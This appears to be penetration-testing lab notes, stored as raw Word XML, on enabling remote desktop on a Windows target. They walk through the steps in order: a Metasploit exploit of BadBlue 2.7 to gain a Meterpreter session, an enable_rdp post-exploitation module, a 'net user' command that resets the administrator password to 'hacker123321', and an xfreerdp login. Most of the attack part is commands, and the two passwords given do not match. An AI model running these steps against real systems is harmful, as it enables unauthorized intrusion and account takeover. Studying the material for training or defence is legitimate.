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447E1" w14:textId="73C3B3E5" w:rsidR="00853ABF" w:rsidRPr="00E0046A" w:rsidRDefault="00E0046A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0046A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enabling RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0046A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD686D1" w14:textId="77777777" w:rsidR="00E0046A" w:rsidRDefault="00E0046A"/>
    <w:p w14:paraId="6F9C29D9" w14:textId="20850411" w:rsidR="005B1631" w:rsidRDefault="005B1631">
      <w:r>
        <w:t>Remote desktop protocol (GUI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754AB55E" w14:textId="4E1CD806" w:rsidR="005B1631" w:rsidRDefault="005B1631">
      <w:r>
        <w:t>RDP= 3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA22ADF" w14:textId="2543CBAB" w:rsidR="004E0370" w:rsidRDefault="004E0370">
      <w:r>
        <w:t>It is disabled by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E499DF" w14:textId="787CB3BF" w:rsidR="004E0370" w:rsidRDefault="004E0370">
      <w:r>
        <w:t>Important protocol to test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E0EF29" w14:textId="77777777" w:rsidR="004E0370" w:rsidRDefault="004E0370"/>
    <w:p w14:paraId="42C7885F" w14:textId="48B80781" w:rsidR="004E0370" w:rsidRDefault="004E0370">
      <w:r>
        <w:t>Utilize an MSF exploit module to enable RDP and access to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C766CD6" w14:textId="6A86A637" w:rsidR="004E0370" w:rsidRPr="00AE58B7" w:rsidRDefault="004E0370">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE58B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDP authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8DEC88" w14:textId="4A7B85D1" w:rsidR="004E0370" w:rsidRDefault="004E0370">
      <w:r>
        <w:t>User account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBED427" w14:textId="141EF002" w:rsidR="004E0370" w:rsidRDefault="004E0370">
      <w:r>
        <w:t>Password (clear text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9ECD3E" w14:textId="77777777" w:rsidR="004E0370" w:rsidRDefault="004E0370"/>
    <w:p w14:paraId="73A81D64" w14:textId="77777777" w:rsidR="004E0370" w:rsidRDefault="004E0370"/>
    <w:p w14:paraId="2BEA7AD8" w14:textId="655EE08D" w:rsidR="004E0370" w:rsidRPr="00D62093" w:rsidRDefault="004E0370">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62093">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497DCD52" w14:textId="2938C09F" w:rsidR="004E0370" w:rsidRDefault="004E0370"/>
    <w:p w14:paraId="675D5933" w14:textId="1A716A0D" w:rsidR="00D62093" w:rsidRDefault="00D62093">
      <w:r>
        <w:t xml:space="preserve">Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323EC858" w14:textId="5D49FDAD" w:rsidR="00D62093" w:rsidRDefault="00D62093">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE21E4" w14:textId="2C962328" w:rsidR="00D62093" w:rsidRDefault="00D62093">
      <w:r>
        <w:t xml:space="preserve">Workspace -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F3B550B" w14:textId="65361DC9" w:rsidR="00D62093" w:rsidRDefault="00D62093">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Setg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0400E5DC" w14:textId="70377A1B" w:rsidR="00D62093" w:rsidRDefault="00D62093">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_nmap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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4519D0C4" w14:textId="34DF2AE4" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>#rdp is disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6F1DEE" w14:textId="77777777" w:rsidR="00D845F4" w:rsidRDefault="00D845F4"/>
    <w:p w14:paraId="0F486399" w14:textId="1E6934C3" w:rsidR="00D62093" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57421D41" w14:textId="25ABD6BC" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2514E5F5" w14:textId="0EBBB966" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9BC0DB" w14:textId="760AA036" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t xml:space="preserve">Set target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>\ EE\ 2.7\ Universal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78082F5C" w14:textId="6DFC29C9" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B3AF00" w14:textId="0E479F69" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6577C516" w14:textId="4844DB08" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FBF1E15" w14:textId="7A74B7DA" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1098B431" w14:textId="77777777" w:rsidR="00D845F4" w:rsidRDefault="00D845F4"/>
    <w:p w14:paraId="1A839803" w14:textId="544C299E" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7170EB4C" w14:textId="77777777" w:rsidR="00D845F4" w:rsidRDefault="00D845F4"/>
    <w:p w14:paraId="675330DA" w14:textId="72318191" w:rsidR="00D845F4" w:rsidRPr="00AE58B7" w:rsidRDefault="00D845F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE58B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE58B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enable_rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FD18387" w14:textId="617F44B7" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>Use (index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7C35C3" w14:textId="6DD6D23E" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43579352" w14:textId="5CDD3241" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568C202F" w14:textId="50727FBD" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0851FC3F" w14:textId="2DE25174" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>#rdp enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FAFA99" w14:textId="4E35B902" w:rsidR="00D845F4" w:rsidRDefault="00D845F4"/>
    <w:p w14:paraId="7CE5E91C" w14:textId="65423967" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">p 3389 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7666AF01" w14:textId="77B5653C" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t># it opens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793CEA6F" w14:textId="77777777" w:rsidR="00D845F4" w:rsidRDefault="00D845F4"/>
    <w:p w14:paraId="18D2FBC4" w14:textId="3173AB7B" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>Sessions id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6580F0E8" w14:textId="77777777" w:rsidR="00D845F4" w:rsidRDefault="00D845F4"/>
    <w:p w14:paraId="01637FBF" w14:textId="239C35A5" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A50C90A" w14:textId="1596271C" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE6839" w14:textId="147BE5C1" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>Net users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A4A6D" w14:textId="5D655BB4" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE58B7">
        <w:t>users on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203A6E10" w14:textId="025A4D65" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>here</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we modify the password of the administrator as it is not recommended because when he/she login this will be flagged out that the password is changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296DFB1E" w14:textId="77777777" w:rsidR="00D845F4" w:rsidRDefault="00D845F4"/>
    <w:p w14:paraId="17611B56" w14:textId="4869A4FE" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Net user administrator hacker</w:t>
      </w:r>
      <w:r w:rsidR="00727D42">
        <w:t>123321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C2A70" w14:textId="15639F76" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:r>
        <w:t xml:space="preserve"># change the password of </w:t>
      </w:r>
      <w:r>
        <w:t>administrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hacker</w:t>
      </w:r>
      <w:r w:rsidR="00727D42">
        <w:t>123321</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D845F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inoder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D845F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to change the password we must have to require the administrative </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D845F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>privs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D845F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B00B6B3" w14:textId="13F4087A" w:rsidR="00D845F4" w:rsidRDefault="00D845F4"/>
    <w:p w14:paraId="5B957641" w14:textId="00479B7B" w:rsidR="00640EE3" w:rsidRDefault="00640EE3">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>terminate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506094B2" w14:textId="5804918C" w:rsidR="00640EE3" w:rsidRDefault="00640EE3">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>back</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="281EC416" w14:textId="77777777" w:rsidR="00640EE3" w:rsidRDefault="00640EE3"/>
    <w:p w14:paraId="44E05A88" w14:textId="77777777" w:rsidR="00640EE3" w:rsidRDefault="00640EE3"/>
    <w:p w14:paraId="3F47554B" w14:textId="7C70D3E3" w:rsidR="00640EE3" w:rsidRDefault="00640EE3">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the new terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CAC9E2" w14:textId="735E8206" w:rsidR="00640EE3" w:rsidRDefault="00640EE3">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00727D42">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00727D42">
        <w:t>u:administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00727D42">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00727D42">
        <w:t>p:hacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00727D42">
        <w:t>_123321 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00727D42">
        <w:t>v:target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00727D42">
        <w:t>_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="562CDBEF" w14:textId="066D16BE" w:rsidR="00727D42" w:rsidRDefault="00727D42">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the remote desktop access</w:t>
      </w:r>
      <w:r w:rsidR="00AC76C7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2E1DEB" w14:textId="77777777" w:rsidR="00727D42" w:rsidRDefault="00727D42"/>
    <w:p w14:paraId="2B8667E4" w14:textId="77777777" w:rsidR="00640EE3" w:rsidRDefault="00640EE3"/>
    <w:p w14:paraId="043833EC" w14:textId="5E1416C5" w:rsidR="00D845F4" w:rsidRPr="00D845F4" w:rsidRDefault="00D845F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D845F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D52A6" w14:textId="3D490D87" w:rsidR="00D845F4" w:rsidRDefault="00D845F4">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can create a user on the system with the help of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enbled_rd</w:t>
      </w:r>
      <w:r w:rsidR="00515CBE">
        <w:t>p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00515CBE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F0C541" w14:textId="65B423AF" w:rsidR="00515CBE" w:rsidRDefault="00515CBE">
      <w:r>
        <w:t xml:space="preserve">It is recommended to create the new user account not to change the password of the current </w:t>
      </w:r>
      <w:r w:rsidR="00853555">
        <w:t>users available</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBC1916" w14:textId="703F7E9A" w:rsidR="00515CBE" w:rsidRDefault="00277DB3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277DB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00277DB3">
        <w:t xml:space="preserve">an open-source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277DB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FreeRDP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277DB3">
        <w:t xml:space="preserve"> command-line client used to connect to Windows Remote Desktop (RDP).</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00515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6A"/>
    <w:rsid w:val="00277DB3"/>
    <w:rsid w:val="004E0370"/>
    <w:rsid w:val="00515CBE"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005B1631"/>
    <w:rsid w:val="005D270E"/>
    <w:rsid w:val="00640EE3"/>
    <w:rsid w:val="00727D42"/>
    <w:rsid w:val="00853555"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00A5786A"/>
    <w:rsid w:val="00AC76C7"/>
    <w:rsid w:val="00AE58B7"/>
    <w:rsid w:val="00D62093"/>
    <w:rsid w:val="00D845F4"/>
    <w:rsid w:val="00E0046A"/>
    <w:rsid w:val="00F2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858CD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80FB38E1-C2A8-4B1F-A73F-EC03ED49E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23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-11T13:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-11T14:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>